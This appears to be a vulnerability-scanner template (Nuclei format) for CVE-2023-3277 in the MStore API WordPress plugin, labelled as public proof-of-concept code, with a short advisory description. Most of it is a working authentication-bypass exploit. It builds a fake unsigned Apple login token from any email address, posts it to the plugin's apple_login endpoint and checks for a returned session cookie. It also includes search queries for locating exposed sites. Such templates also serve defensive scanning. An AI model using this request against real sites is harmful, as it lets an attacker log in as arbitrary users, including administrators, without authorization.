The MStore API plugin for WordPress is vulnerable to Unauthorized Account Access and Privilege Escalation in versions up to, and including, 4.10.7 due to improper implementation of the Apple login feature. This allows unauthenticated attackers to log in as any user as long as they know the user's email address.
PoC代码[已公开]
id: CVE-2023-3277
info:
name: MStore API <= 4.10.7 - Unauthorized Account Access and Privilege Escalation
author: daffainfo
severity: critical
description: |
The MStore API plugin for WordPress is vulnerable to Unauthorized Account Access and Privilege Escalation in versions up to, and including, 4.10.7 due to improper implementation of the Apple login feature. This allows unauthenticated attackers to log in as any user as long as they know the user's email address.
impact: |
Attackers can log in as any user and escalate privileges, potentially leading to full account compromise.
remediation: |
No patch available yet; monitor for updates from the developer and apply patches as soon as they are released.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c0c35-5f44-488f-9fe1-269ea4a73854?source=cve
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2988788%40mstore-api%2Ftrunk&old=2985882%40mstore-api%2Ftrunk&sfp_email=&sfph_mail=
- https://plugins.trac.wordpress.org/browser/mstore-api/trunk/controllers/flutter-user.php#L821
- https://nvd.nist.gov/vuln/detail/CVE-2023-3277
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3277
epss-score: 0.3254
epss-percentile: 0.9668
cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: inspireui
product: mstore_api
framework: wordpress
fofa-query: body="/wp-content/plugins/mstore-api/"
publicwww-query: "/wp-content/plugins/mstore-api/"
tags: cve,cve2023,wordpress,wp,wp-plugin,inspireui,mstore_api,auth-bypass,vkev
variables:
email: "{{email}}"
token: '{{concat(".", base64("{\"email\":\"" + email + "\"}"), ".")}}'
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /wp-json/api/flutter_user/apple_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"token":"{{token}}","first_name":"{{firstname}}","last_name":"{{lastname}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"wp_user_id"'
- '"cookie"'
- '"user_login"'
condition: and
- type: word
part: content_type
words:
- application/json
- type: status
status:
- 200
# digest: 4a0a00473045022022b8be7f5987abd6bce030c56d00367d45d8bcb517621c56cd91c0af378c1ab3022100981f5a31e6082902eeed80ef6988d760f5b79442dc33973ee3871f19ead5e827:922c64590222798bb761d5b6d8e72950